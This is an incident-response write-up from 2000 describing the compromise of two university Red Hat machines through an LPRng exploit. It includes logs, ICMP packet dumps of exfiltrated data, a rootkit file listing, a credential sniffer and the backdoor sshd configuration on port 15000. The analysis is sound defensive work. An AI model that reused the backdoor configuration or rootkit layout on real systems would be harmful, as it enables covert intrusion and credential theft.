    e>
    eootA
    e

    /var/log/maillog

    Victim#1

    Nov 25 14:46:15 victim1 sendmail[2717]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 108: readcf: map arith: class arith not available
    Nov 25 14:46:15 victim1 sendmail[2717]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 249: DaemonPortOptions parameter "Name=MTA" unknown
    Nov 25 14:46:15 victim1 sendmail[2717]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 250: DaemonPortOptions parameter "Name=MSA" unknown
    Nov 25 14:46:15 victim1 sendmail[2717]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 250: DaemonPortOptions parameter "M=E" unknown
    Nov 25 14:46:15 victim1 sendmail[2717]: NOQUEUE: SYSERR(root): Warning: .cf version level (9) exceeds sendmail version 8.9.3 functionality (8): Socket operation on non-socket

    Victim#2

    Nov 25 14:53:03 victim2 sendmail[4611]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 108: readcf: map arith: class arith not available
    Nov 25 14:53:03 victim2 sendmail[4611]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 249: DaemonPortOptions parameter "Name=MTA" unknown
    Nov 25 14:53:03 victim2 sendmail[4611]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 250: DaemonPortOptions parameter "Name=MSA" unknown
    Nov 25 14:53:03 victim2 sendmail[4611]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 250: DaemonPortOptions parameter "M=E" unknown
    Nov 25 14:53:03 victim2 sendmail[4611]: NOQUEUE: SYSERR(root): Warning: .cf version level (9) exceeds sendmail version 8.9.3 functionality (8): Socket operation on non-socket

     The Exploitt
    I believe the attacker exploited the vulnerability in LPRng, however I'm still unclear about what part the connections to port 3879 had in the exploit.  I've downloaded several different exploit code for LPRng and have not been able to reprod
    LPRng - The full  code is available on BugTraq.

    /*
     *  Copyright (c) 2000 - Security.is
     *
     *  The following material may be freely redistributed, provided
     *  that the code or the disclaimer have not been partly removed,
     *  altered or modified in any way. The material is the property
     *  of security.is. You are allowed to adopt the represented code
     *  in your programs, given that you give credits where it's due.
     *
     * security.is presents: LPRng/Linux remote root lpd exploit.
     *
     * Author: DiGiT - teddi@linux.is
     *
     * Thanks to: portal for elite formatstring talent ;>

    The Discovery/Compromise

    After compromise: 

    [Snort Alert log]
    Nov 25 17:16:46 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 26 11:12:27 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 27 14:16:09 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 28 08:13:51 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 28 17:11:42 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 28 17:15:46 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 29 10:28:44 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 29 10:30:47 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 29 10:47:02 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 29 10:53:09 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210

    [TCPdump of the above ICMP packets]
    10:47:02.766849 0:0:ef:3:4d:60 0:0:ef:3:80:f0 0800 1058: X.X.8.60 > 18.242.162.210: icmp: echo reply
    0x0000   4500 0414 b20e 0000 3f01 70de 5858 083c        E.......?.p....<
    0x0010   12f2 a2d2 0000 9ca3 1a0a 0000 0000 0000        ................
    0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0030   736b 696c 6c7a 0000 0000 0000 0000 0000        skillz..........
    0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0050   0000 0000 0000 0000 0000 0000 0000 0000        ................
    <clipped>
    10:53:08.755452 0:0:ef:3:4d:60 0:0:ef:3:80:f0 0800 1058: X.X2.8.60 > 18.242.162.210: icmp: echo reply
    0x0000   4500 0414 b225 0000 3f01 70c7 5858 083c        E....%..?.p....<
    0x0010   12f2 a2d2 0000 9ca3 1a0a 0000 0000 0000        ................
    0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0030   736b 696c 6c7a 0000 0000 0000 0000 0000        skillz..........
    0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0050   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0060   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0070   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0080   0000 0000 0000 0000 0000 0000 0000 0000        ................
    <clipped>


    Monday, Nov 27, 2000 (9:30am) : I noticed a few scans in the weekend logfiles. The scans originated outside of our network.  Scans are common in our environment (dot.edu).  Normally I check a few other logs for signs of intrusion and if I find nothing, I simply make a few notes of the event.  However my antena's were active and I had an odd feeling about these scans.  With no evidence at hand, I decided to send an email message to several of our System Administrators and to the Managers of various System Administrators on our campus. In this message mentioned the scans and reminded them of the increased dangers during the Christmas season and encouraged them to take extra time to secure their servers.

    Wednesday, Nov 29, 2000 (5pm): An employee casually stops at my office door on his way out and asks if I know "any reason why 'ls' would stop working". 

    Anyone reading this now will immediately recognize the clue.  But I've seen new unix administrators do some pretty weird things to their machines.  I kept the idea of a rootkit in the back of my mind while I asked more questions.
     

    Q: "What do you mean stopped working?"
    A:  "If I'm logged in as a normal user, ls only returns a prompt.  But if I'm root, I get the directory listing."
    Q: "Are you listing the same directory from each login?"
    A: "Yes."
    Q: "Are you sure?" (it's amazing how many people get stumped with this question.)
    A: "Uh.. yeah, I'm pretty sure... well, I think I did."
    Q: "Have you made any system changes lately?"
    A: "Oh yeah!  I've installed all kinds of stuff over the last couple of days."
    Q: "When is the last time 'ls' worked?"
    A: "I don't remember."
    Q: "Has 'ls' *ever* worked?"
    A: "Yes."
    Q: "What operating system are you using?"
    A: "RH 7, I just installed it a few weeks ago."
    Q: "Do you normally do your work as root?"
    A: "Yes, pretty much."
    Q: "But you are SURE 'ls' was working from a non priviledged account?"
    A: "Yes, I'm positive."
    Now I've heard enough to make me curious. I ask him to show me what's happening.  We walk to his office and he logs into his console with his nonpriviledged account.  At the system prompt, he executes 'ls'.  The system prompt returned, just as he had said.  There was no listing.
    Me: "Do a 'pwd'"
    He is in his home directory
    Me: "Execute 'ls -al'"
    Again, the prompt returns promptly.
    He su's to root and excutes 'ls' again.  This time there are files listed.
    Me: "Do a 'pwd'"
    He is in the same directory as before.
    Me: "Execute 'ls -al'"
    Afull listing returns.
    I verify the permissions are set correctly on . and ..
    Me: "Go back to the non priviledged account."
    He returns to his normal user login
    Me: "Type 'which ls'"
    /bin/ls returns.
    Me: "Type 'stat *'"
    We get the full status information on all the files in his directory.  This means his account does not have a problem reading the directory information.
    Now he tries to 'ls' other directories, all result in the some return... nothing.

    About this time a Sr Unix Administrator walks by.  I seize the opportunity and seek his insight.  He followed the same path I had.  Same questions, same commands.  He also check the /dev/<filesystem> permissions and  kmem permissions.  These last items were not really expected to produce answers.  We were now looking for correlation.

    The Sr Admin sat at the keyboard.  The "new" Admin watched with bated breath, another unix/programmer had joined us.  I was almost at peace with letting the Sr. Admin solve the mystery when I heard it. Five words spoken softlly, almost as if they were still in thought.. "PS does the same thing." 

    There was a low hum as the gasps filled the air.  I hear my name "Maarreeee".  Then in almost a whisper the programmer brings me back to reality as he declared aloud what was now almost certain,"Rootkit!".

    The Sr. Admin and the programmer return to their offices.  The new (now most surely VICTIM) admin gave me the root password to his machine, expressed regrets (he really did want to stick around for the show, but had other committments ), and went home.

    I logged into the console with the root account.  Even though we have strong indication the system has been compromised, there has been no proof.  It is getting late and I've been doing this too long to want to stay up all night working on this.  My objective for the night is to find evidence the system has been compromised and remove any threat or danger the machine or our network may currently be in (in otherwords, verify the hack and quarantine the machine)

    At this time, I am still using commands which are on the suspect-machine.  I know this is not the preferred method, but I wanted solid proof before I spent too much time working on this.

    My first thought is to capture network traffic going to or from the victim machine.

    I asked the Sr. Admin if he had any servers on the same segment of our network as the Victim machine.  He had serveral unix servers running on that segment.
    I asked if he had tcpdump installed on any of these servers.  He did not have it installed but  offered to install it.

    While he was installing tcpdump, I looked though the systems logfiles in /var/log.  As I expected, the syslog.conf was running with 'default' settings.  This means it will have very little logging.  By viewing the /etc/syslog.conf file I can tell which files might possibly have logged interesting events.  This information gets me started.

    Console#>  cd /var/log
    Console# > ls -alt|more
    The command 'ls -alt' sorts the files by time modified with the most recently modified first.
    Console#> more /var/log/secure
    This is where I noticed an unusual telnet connection from another machine on our campus.  Still, this is not evidence of an attack or an intrusion, but I do make note of the date and time the connection occurred.
    Console#> more /var/log/messages
    Nothing unusual here.  I notice the log was rotated on Nov 26 via cron.  I remember the telnet connection from the/var/log/secure file which occured on Nov 25.  I decide to check the previous message log file.
    Console#> more /var/log/messages.1
    BINGO!  That didn't take long.  After reading 1488 boring lines I found an entry where someone was attempting to exploit a buffer overflow.  Now I have proof that someone TRIED to break into the machine.  I still do not have proof they succeeded.  I continued paging through the messages.1 file.  There was line after line of the attempt. There were 811 lines in the logfile of the buffer overflow code.  It seemed like forever before I reached the end of it.  Finally, at the end of the buffer overflow entries was a log message indicating the ethernet interface was entering  promisuous mode.

    I checked the ifconfig -a output and verified that promisuous mode was currently enabled.
    I verified via an uncompromised Redhat 7 machine, that promiscuous mode is not enabled by default.

    From another machine, I scanned Victim#1 with nmap.
     

    (The 65517 ports scanned but not shown below are in state: closed)
    Port       State       Service
    22/tcp     open        ssh
    23/tcp     open        telnet
    25/tcp     open        smtp
    79/tcp     open        finger
    80/tcp     open        http
    111/tcp    open        sunrpc 
    113/tcp    open        ident
    513/tcp    open        login
    514/tcp    open        shell
    515/tcp    open        printer
    587/tcp    open        submission
    1025/tcp   open        blackjack
    3306/tcp   open        mysql
    3879/tcp   open        unknown
    7786/tcp   open        minivend
    8080/tcp   open        http-alt
    8765/tcp   open        ultraseek-http
    15000/tcp  open        unknown
    Port 15000 grabbed my attention.  I telneted to the port (telnet victim1.edu 15000) and recieved a ssh banner.

    I suspect a backdoor sshd has been installed, however I cannot verify this until I talk to the system owner (he's been known to do unusual things while testing applications)
    A hindsight note: As I am writing this, I notice that port 3879 is open... hmmm.

    Now it is decision time.  Do we unplug the machine from the network, or ride along for awhile.  Normally I would have installed tcpdump on a neighboring machine to see what might be happening, but the Sr. Admin had not yet been able to install tcpdump. It was almost 7pm and my dinner was getting cold.

    I decided to unplug the machine from the network and go home.  Before leaving the office, I blocked all access to and from the machine at the firewall. This was done to prevent the machine from being accidentally plugged back into the network.

    I spent the evening thinking about how to proceed the following day.  One item which bothered me was the telnet connection to the victim machine from one of our machines.  There was a possibility other machines were compromised also.

    DAY 2:
    I logged into the server which keeps my firewall logs.  I grep'ed Nov 25's logfile for the IP Address of the machine which had established the telnet connection to victim#1.
    There was suspicious traffic which could indicate a compromise.  I grep'ed the IP Address of victim#1 from the same logfile and discovered the patterns were identical.
    I made a few phone calls in an attempt to locate the owner of the second machine.  I would have to wait until later in the day for contact information in order to verify the compromise.

    I made a list of the files I would need to review the damage on the machine (ls, find, ps, lsof, etc) and copied them from another linux server via floppy disk (remember, the machine is still unplugged from the network).

    I logged into the console and created a directory to copy my good files into.  The login process took much longer than normal and triggered my suspicions.

    Console#> /gooddir/ls -al /sbin/login
     -rwx------   root /lp           4276 Nov 25 14:53 /sbin/login


    I know login is not normally located in sbin, and I don't have any idea why I looked there, but what a way to get started! 
    Clue #1, group owner is lp. Also the size seems a little small, and there is the date issue.  But the group ownership is what I focused on.
    I executed a find command to locate all files which were group owned by lp. 

    Console#> /gooddir/find / -group lp -ls

    47710210    0 dr-xr-xr-x   3 lp/lp             0 Dec  1 13:13 /proc/728
    836755    4 -rw-r--r--   1 lp/lp               4 Nov 28 16:57 /var/run/lpd.printer
    557716    4 drwx------   2 lp/lp            4096 Nov 17 14:16 /var/spool/lpd/lp
    557719    4 -rw-------   1 lp/lp             192 Nov 17 13:59 /var/spool/lpd/lp/general.cfg
    557725    4 -rw-------   1 lp/lp             347 Nov 17 13:59 /var/spool/lpd/lp/postscript.cfg
    557727    4 -rw-------   1 lp/lp             146 Nov 17 13:59 /var/spool/lpd/lp/textonly.cfg
    557728    0 -rw-------   1 lp/lp               0 Nov 17 13:56 /var/spool/lpd/lp/control.hp1200cn
    557731    8 -rw-------   1 lp/lp            6798 Nov 17 14:16 /var/spool/lpd/lp/status.hp1200cn
    557732    0 -rw-------   1 lp/lp               0 Nov 17 13:56 /var/spool/lpd/lp/status
    557733    0 -rw-------   1 lp/lp               0 Nov 17 13:56 /var/spool/lpd/lp/log
    557734    4 -rw-------   1 lp/lp             680 Nov 17 14:16 /var/spool/lpd/lp/acct
    557737    0 -rw-------   1 lp/lp               0 Nov 17 14:16 /var/spool/lpd/lp/hp1200cn
    557738    4 -rw-------   1 lp/lp               5 Nov 17 14:16 /var/spool/lpd/lp/unspooler.hp1200cn
    983152    4 drwx------   2 lp/lp            4096 Nov 17 14:04 /var/spool/lpd/lp0
    983154    4 -rw-------   1 lp/lp             192 Nov 17 14:04 /var/spool/lpd/lp0/general.cfg
    983155    4 -rw-------   1 lp/lp             342 Nov 17 14:04 /var/spool/lpd/lp0/postscript.cfg
    983156    4 -rw-------   1 lp/lp             146 Nov 17 14:04 /var/spool/lpd/lp0/textonly.cfg
    983157    0 -rw-------   1 lp/lp               0 Nov 17 14:00 /var/spool/lpd/lp0/control.hp4mv
    983158    4 -rw-------   1 lp/lp            2069 Nov 17 14:00 /var/spool/lpd/lp0/status.hp4mv
    983159    0 -rw-------   1 lp/lp               0 Nov 17 14:00 /var/spool/lpd/lp0/status
    983160    0 -rw-------   1 lp/lp               0 Nov 17 14:00 /var/spool/lpd/lp0/log
    983161    4 -rw-------   1 lp/lp             450 Nov 17 14:04 /var/spool/lpd/lp0/acct
    983164    0 -rw-------   1 lp/lp               0 Nov 17 14:00 /var/spool/lpd/lp0/hp4mv
    983165    4 -rw-------   1 lp/lp               5 Nov 17 14:00 /var/spool/lpd/lp0/unspooler.hp4mv
    983162    0 -rw-------   1 lp/lp               0 Nov 17 14:04 /var/spool/lpd/lp0/control.hplj4000
    983163    4 -rw-------   1 lp/lp            2093 Nov 17 14:04 /var/spool/lpd/lp0/status.hplj4000
    983168    0 -rw-------   1 lp/lp               0 Nov 17 14:04 /var/spool/lpd/lp0/hplj4000
    197622    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/lp0
    197623    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/lp1
    197624    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/lp2
     16740    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp0
     16741    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp1
     16742    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp10
     16743    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp11
     16744    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp12
     16745    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp13
     16746    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp14
     16747    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp15
     16748    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp2
     16749    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp3
     16750    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp4
     16751    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp5
     16752    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp6
     16753    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp7
     16754    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp8
     16755    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp9
    202991    0 -rw-------   1 root/lp         0 Nov 25 14:53 /dev/dos
     16527    8 -rwx------   1 root/lp      5228 Nov 25 14:53 /etc/rc.d/init.d/network
    214154    4 -rw-------   1 root/lp        14 Nov 25 14:53 /etc/ld.so.hash
    311861   20 -rwx------   1 root/lp     19464 Nov 25 14:53 /bin/xlogin
     33432    4 drwx------   5 root/lp      4096 Dec  1 13:08 /lib/security/.config
     33433    4 drwx------   2 root/lp     4096 Nov 25 14:53 /lib/security/.config/backup
     33445   20 -rwx------   1 root/lp     19464 Nov 25 14:53 /lib/security/.config/backup/login
     33447    8 -rwx------   1 root/lp      5228 Nov 25 14:53 /lib/security/.config/backup/network
     33448   40 -rwx------   1 root/lp     37884 Nov 25 14:53 /lib/security/.config/backup/in.telnetd
     33434    4 drwx------   2 root/lp      4096 Nov 25 14:53 /lib/security/.config/bin
     33436   16 -rws------   1 root/lp     14184 Nov 25 14:53 /lib/security/.config/bin/su
     33437   24 -rws------   1 root/lp     20604 Nov 25 14:53 /lib/security/.config/bin/ping
     33438   28 -rwx------   1 root/lp     25116 Nov 25 14:53 /lib/security/.config/bin/du
     33439   16 -r-s------   1 root/lp     13536 Nov 25 14:53 /lib/security/.config/bin/passwd
     33440   80 -rwx------   1 root/lp     74236 Nov 25 14:53 /lib/security/.config/bin/find
     33441   44 -rwx------   1 root/lp     43740 Nov 25 14:53 /lib/security/.config/bin/ls
     33442   84 -rwx------   1 root/lp     78012 Nov 25 14:53 /lib/security/.config/bin/netstat
     33443   88 -rwx------   1 root/lp     83868 Nov 25 14:53 /lib/security/.config/bin/lsof
     33444   68 -r-x------   1 root/lp     65148 Nov 25 14:53 /lib/security/.config/bin/psr
     33435    4 -rw-------   1 root/lp       652 Nov 25 14:53 /lib/security/.config/uconf.inv
     33446  208 -rwx------   1 root/lp    205288 Nov 25 14:53 /lib/security/.config/sshd
    902260    4 drwx------   2 root/lp      4096 Nov 25 14:53 /lib/security/.config/ssh
    902274    4 -rw-------   1 root/lp       525 Nov 25 14:53 /lib/security/.config/ssh/ssh_host_key
    902276    4 -rw-------   1 root/lp       329 Nov 25 14:53 /lib/security/.config/ssh/ssh_host_key.pub
    902277    4 -rw-------   1 root/lp       512 Nov 28 16:57 /lib/security/.config/ssh/ssh_random_seed
    902278    4 -rw-------   1 root/lp       461 Nov 25 14:53 /lib/security/.config/ssh/sshd_config
     33449    8 -rwx------   1 root/lp      5064 Nov 25 14:53 /lib/security/.config/ava
     33450    4 -rwx------   1 root/lp      4032 Nov 25 14:53 /lib/security/.config/cleaner
     33451    4 -rwx------   1 root/lp      1596 Nov 25 14:53 /lib/security/.config/sz
     33452    4 -rwx------   1 root/lp       960 Nov 25 14:53 /lib/security/.config/patcher
     33453   12 -rwx------   1 root/lp     11970 Nov 25 14:53 /lib/security/.config/pg
     33454    4 -rwx------   1 root/lp      3648 Nov 25 14:53 /lib/security/.config/crypt
     33455    4 -rwx------   1 root/lp      3052 Nov 25 14:53 /lib/security/.config/utime
     33456    8 -rwx------   1 root/lp      7028 Nov 25 14:53 /lib/security/.config/lpsched
     33457   20 -rw-------   1 root/lp     19442 Nov 30 15:18 /lib/security/.config/mfs
    557659    8 -rwx------   1 root/lp      4276 Nov 25 14:53 /sbin/login
    688864  424 -rwxr-xr-x   1 lp/lp      429984 Aug 14 14:23 /usr/bin/lpq
    688865  436 -rwxr-xr-x   1 lp/lp      439872 Aug 14 14:23 /usr/bin/lpr
    688866  424 -rwxr-xr-x   1 lp/lp      426720 Aug 14 14:23 /usr/bin/lprm
    688867  428 -rwxr-xr-x   1 lp/lp      433792 Aug 14 14:23 /usr/bin/lpstat
    689619  208 -rwxr-xr-x   1 root/lp    205288 Nov 25 14:53 /usr/bin/ssh2d
    770760   96 -rwx------   1 root/lp     93924 Nov 25 14:53 /usr/lib/lpq
    770761    8 -r--------   1 root/lp      5500 Nov 25 14:53 /usr/lib/crth.o
    328124  428 -rwxr-xr-x   1 lp/lp      431584 Aug 14 14:23 /usr/sbin/lpc

    There are two ways to identify the rootkit files from the above output.  First, they aare all dated Nov 25, 14:53 (Note: The listing used here was created for this report after the initial investigation was complete. The rootkit directory may have been modified during my investigation), which reflect Second, they are owner root, group lp. It is important to notice that there are also some legitimate files which are root/lp. These can be distinquished by their dates, however I did compare each file with an existing (uncompromised) Redhat 7 server.

    Using the above criteria, the list of files is narrowed down to the following:

    202991    0 -rw-------   1 root/lp         0 Nov 25 14:53 /dev/dos
     16527    8 -rwx------   1 root/lp      5228 Nov 25 14:53 /etc/rc.d/init.d/network
    214154    4 -rw-------   1 root/lp        14 Nov 25 14:53 /etc/ld.so.hash
    311861   20 -rwx------   1 root/lp     19464 Nov 25 14:53 /bin/xlogin
     33432    4 drwx------   5 root/lp      4096 Dec  1 13:08 /lib/security/.config
     33433    4 drwx------   2 root/lp      4096 Nov 25 14:53 /lib/security/.config/backup
     33445   20 -rwx------   1 root/lp     19464 Nov 25 14:53 /lib/security/.config/backup/login
     33447    8 -rwx------   1 root/lp      5228 Nov 25 14:53 /lib/security/.config/backup/network
     33448   40 -rwx------   1 root/lp     37884 Nov 25 14:53 /lib/security/.config/backup/in.telnetd
     33434    4 drwx------   2 root/lp      4096 Nov 25 14:53 /lib/security/.config/bin
     33436   16 -rws------   1 root/lp     14184 Nov 25 14:53 /lib/security/.config/bin/su
     33437   24 -rws------   1 root/lp     20604 Nov 25 14:53 /lib/security/.config/bin/ping
     33438   28 -rwx------   1 root/lp     25116 Nov 25 14:53 /lib/security/.config/bin/du
     33439   16 -r-s------   1 root/lp     13536 Nov 25 14:53 /lib/security/.config/bin/passwd
     33440   80 -rwx------   1 root/lp     74236 Nov 25 14:53 /lib/security/.config/bin/find
     33441   44 -rwx------   1 root/lp     43740 Nov 25 14:53 /lib/security/.config/bin/ls
     33442   84 -rwx------   1 root/lp     78012 Nov 25 14:53 /lib/security/.config/bin/netstat
     33443   88 -rwx------   1 root/lp     83868 Nov 25 14:53 /lib/security/.config/bin/lsof
     33444   68 -r-x------   1 root/lp     65148 Nov 25 14:53 /lib/security/.config/bin/psr
     33435    4 -rw-------   1 root/lp       652 Nov 25 14:53 /lib/security/.config/uconf.inv
     33446  208 -rwx------   1 root/lp    205288 Nov 25 14:53 /lib/security/.config/sshd
    902260    4 drwx------   2 root/lp      4096 Nov 25 14:53 /lib/security/.config/ssh
    902274    4 -rw-------   1 root/lp       525 Nov 25 14:53 /lib/security/.config/ssh/ssh_host_key
    902276    4 -rw-------   1 root/lp       329 Nov 25 14:53 /lib/security/.config/ssh/ssh_host_key.pub
    902277    4 -rw-------   1 root/lp       512 Nov 28 16:57 /lib/security/.config/ssh/ssh_random_seed
    902278    4 -rw-------   1 root/lp       461 Nov 25 14:53 /lib/security/.config/ssh/sshd_config
     33449    8 -rwx------   1 root/lp      5064 Nov 25 14:53 /lib/security/.config/ava
     33450    4 -rwx------   1 root/lp      4032 Nov 25 14:53 /lib/security/.config/cleaner
     33451    4 -rwx------   1 root/lp      1596 Nov 25 14:53 /lib/security/.config/sz
     33452    4 -rwx------   1 root/lp       960 Nov 25 14:53 /lib/security/.config/patcher
     33453   12 -rwx------   1 root/lp     11970 Nov 25 14:53 /lib/security/.config/pg
     33454    4 -rwx------   1 root/lp      3648 Nov 25 14:53 /lib/security/.config/crypt
     33455    4 -rwx------   1 root/lp      3052 Nov 25 14:53 /lib/security/.config/utime
     33456    8 -rwx------   1 root/lp      7028 Nov 25 14:53 /lib/security/.config/lpsched
     33457   20 -rw-------   1 root/lp     19442 Nov 30 15:18 /lib/security/.config/mfs
    557659    8 -rwx------   1 root/lp      4276 Nov 25 14:53 /sbin/login
    689619  208 -rwxr-xr-x   1 root/lp    205288 Nov 25 14:53 /usr/bin/ssh2d
    770760   96 -rwx------   1 root/lp     93924 Nov 25 14:53 /usr/lib/lpq
    770761    8 -r--------   1 root/lp      5500 Nov 25 14:53 /usr/lib/crth.o

    It's now pretty clear where the rootkit is installed; (/lib/security/.config).
    I verified from the uncompromised system that there is no .config directory installed by default on Redhat.

    At this point in the investigation, it is easy to lose focus.  There is so much to look at!  However,  my priority is to determine the severity of this attack and if it has placed additional servers at risk.

    I know the ethernet card is in promiscuous mode (even though it is unplugged from the wall).
    I execute '/gooddir/ps' to get a list of currently running processes.

    ./lpsched is runing.
    Using /gooddir/lsof -c lpsched, I discover that lpsched is using the file mfs.  I have now located the snifer application (lpsched) and the sniffers output file (mfs).

    I discover userid's and passwords in the output file. To determine if this data has been retrieved, I return to my firewall logs and start analyzing.  I locate outgiong ICMP replies from victim #1 with no requests.  I searched my tcpdump files and discovered I had captured the outgoing packets! 

    I discovered the destination IP address was different from the attacking machine.  I searched my logs for this new IP and located identical packets from Victim#2. There was no other traffic recorded for this IP (Badguy IP#4).  I contacted the owner of this IP Address block and was informed that the subnet it was allocated to was a Dorm, however this particular address was not issued.

    I recieved a call from the owner of Victim#2.  I explained the situation and asked him to search his machine for the rootkit directory (/lib/security/.config). THe directory was there.  Victim #2 has now been confirmed.

    To create a complete picture I continued analyzing the logs.
    First, I grep'ed all entries to/from Victim#1 on Nov 25th.  From that information, I extracted the connected IP address and grep'ed individually for each.  Excluding the Scanning IP addresss, I only found one additional IP Address listed amongst the IP's which had connected to Victim#1 (X.X.98.224). I searched the logs for this IP address and found nothing else.  I was unable to locate the machine with this address and it appeared to be offline during the time I was investigating.

    I repeated the same procedure above but with Victim#2.
    I merged all the extracted information into one file, sorted and uniq'ed it.  This gave me a fairly accurate log of the events.

    I returned to Victim#1 and archive the rootkit directory.  I create a directory structure off of /goodir and mv trojaned files to the corresponding directory.  I used mv to prevent  the filestats from changing.  Then I cp'd the  /gooddir/<goodfilse> to the correct location. 

    I began analyzing each file in the  rootkit directory.  I was fortunate to have the uncompromised Redhat box in the next office.  This allowed me to quickly determine if the file was compromised. 

    A few days into the analysis process it became clear the machine would require a full reinstall of the operating system. 
    After both machines were reformated and PATCHED, I began searching the internet to determine what rootkit had been used.
     

    Rootkit Directory
    The rootkit is installed in a newly created directory named /lib/security/.config .

    drwx------ root/lp           0 2000-11-25 14:46:14 ./.config/
    drwx------ root/lp           0 2000-11-25 14:46:07 ./.config/backup/
    -rwx------ root/lp       19464 2000-11-25 14:46:06 ./.config/backup/login
    -rwx------ root/lp        5228 2000-11-25 14:46:07 ./.config/backup/network
    -rwx------ root/lp       37884 2000-11-25 14:46:07 ./.config/backup/in.telnetd
    drwx------ root/lp           0 2000-11-25 14:46:06 ./.config/bin/
    -rws------ root/lp       14184 2000-11-25 14:46:06 ./.config/bin/su
    -rws------ root/lp       20604 2000-11-25 14:46:06 ./.config/bin/ping
    -rwx------ root/lp       25116 2000-11-25 14:46:06 ./.config/bin/du
    -r-s------ root/lp       13536 2000-11-25 14:46:06 ./.config/bin/passwd
    -rwx------ root/lp       74236 2000-11-25 14:46:06 ./.config/bin/find
    -rwx------ root/lp       43740 2000-11-25 14:46:06 ./.config/bin/ls
    -rwx------ root/lp       78012 2000-11-25 14:46:06 ./.config/bin/netstat
    -rwx------ root/lp       83868 2000-11-25 14:46:06 ./.config/bin/lsof
    -r-x------ root/lp       65148 2000-11-25 14:46:06 ./.config/bin/psr
    -rw------- root/lp         652 2000-11-25 14:46:06 ./.config/uconf.inv
    -rwx------ root/lp      205288 2000-11-25 14:46:07 ./.config/sshd
    drwx------ root/lp           0 2000-11-25 14:46:07 ./.config/ssh/
    -rw------- root/lp         525 2000-11-25 14:46:07 ./.config/ssh/ssh_host_key
    -rw------- root/lp         329 2000-11-25 14:46:07 ./.config/ssh/ssh_host_key.pub
    -rw------- root/lp         512 2000-11-29 18:46:12 ./.config/ssh/ssh_random_seed
    -rw------- root/lp         461 2000-11-25 14:46:07 ./.config/ssh/sshd_config
    -rwx------ root/lp        5064 2000-11-25 14:46:14 ./.config/ava
    -rwx------ root/lp        4032 2000-11-25 14:46:14 ./.config/cleaner
    -rwx------ root/lp        1596 2000-11-25 14:46:14 ./.config/sz
    -rwx------ root/lp         960 2000-11-25 14:46:14 ./.config/patcher
    -rwx------ root/lp       11970 2000-11-25 14:46:14 ./.config/pg
    -rwx------ root/lp        3648 2000-11-25 14:46:14 ./.config/crypt
    -rwx------ root/lp        3052 2000-11-25 14:46:14 ./.config/utime
    -rwx------ root/lp        7028 2000-11-25 14:46:14 ./.config/lpsched
    -rw------- root/lp       47238 2000-11-29 18:45:10 ./.config/mfs

    The files in /lib/security/.config/bin are the original (good) Linux command
    The files in /lib/security/.config/backup are backups of the trojaned files.
    The files in /lib/security/.config/ssh are the configuration files used by the ssh backdoor.
    • ssh_host_key
      <strings ssh_host_key>
      SSH PRIVATE KEY FILE FORMAT 1.1
      %zrc
      root@NoraD
      4wh#
      /FpBF`
      /-!V
      <End of ssh_host_key>
       
    • ssh_host_key.pub
      024 41 104815528740090300232762682062148731692345617648761
      8848931447497024381787165076021063844673484423325557262722
      2990509006086551815209422016634885187452282711766925606918
      0699567468232805547620203421525417575684002027686936703327
      5595088918404285780009035980854568513549270233145248547086
      53799840391129004567592229 root@NoraD
       
    • sshd_config

    • # This is ssh server systemwide configuration file.

      Port 15000
      ListenAddress 0.0.0.0
      ServerKeyBits 768
      LoginGraceTime 600
      KeyRegenerationInterval 3600
      PermitRootLogin yes
      IgnoreRhosts no
      StrictModes yes
      QuietMode no
      X11Forwarding yes
      X11DisplayOffset 10
      FascistLogging no
      PrintMotd yes
      KeepAlive yes
      SyslogFacility DAEMON
      RhostsAuthentication no
